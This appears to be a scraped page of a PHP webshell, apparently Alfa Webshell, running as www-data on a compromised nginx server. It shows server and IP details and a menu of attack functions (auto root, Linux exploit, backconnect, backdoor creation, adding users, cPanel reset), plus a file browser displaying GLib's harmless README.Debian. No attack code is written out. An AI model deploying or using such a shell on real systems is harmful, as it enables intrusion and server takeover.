Linux ubuntu 6.8.0-90-generic #91-Ubuntu SMP PREEMPT_DYNAMIC Tue Nov 18 14:14:30 UTC 2025 x86_64
nginx/1.24.0
: 67.217.245.49 | : 216.73.216.153
Cant Read [ /etc/named.conf ]
8.3.6
www-data
Bypass.pw
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
Backdoor Scanner
Backdoor Create
Alfa Webshell
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
libglib2.0-0t64 /
[ HOME SHELL ]
Name
Size
Permission
Action
NEWS.gz
231.71
KB
-rw-r--r--
README.Debian
1.66
KB
-rw-r--r--
README.md
3.1
KB
-rw-r--r--
changelog.Debian.gz
30.55
KB
-rw-r--r--
copyright
53.67
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : README.Debian
GLib Debian packaging ===================== Choosing a terminal emulator for Terminal=true applications ----------------------------------------------------------- When a GLib-based application launches a .desktop file with Terminal=true, such as /usr/share/applications/mutt.desktop, GLib must choose a terminal emulator that will be used to display the command-line application. This version of GLib aims to provide reasonable defaults for users of common desktop environments, while allowing advanced users to override those defaults on a system-wide or per-user basis. If the xdg-terminal-exec package is installed, this version of GLib will use it by default. xdg-terminal-exec has not been standardized and is not intended to be included in Debian 12, but will hopefully be included in Debian 13. Otherwise, this version of GLib will prefer to use a GTK-based terminal emulator, even if the x-terminal-emulator alternative points to something different. This is intentional, to avoid having GTK applications in a GTK-based desktop environment launch some other desktop environment's preferred terminal emulator on machines that are shared with a user of a different desktop environment. To override GLib's choice of terminal emulator, users can add a directory such as $HOME/bin to their PATH environment variable, and place a script named "xdg-terminal-exec" in that directory, with contents similar to: #!/bin/sh exec x-terminal-emulator -e "$@" replacing "x-terminal-emulator -e" with their preferred terminal and whatever arguments it requires before the command to be executed. This configuration can be applied system-wide, if desired, by placing a similar script in /usr/local/bin.
Close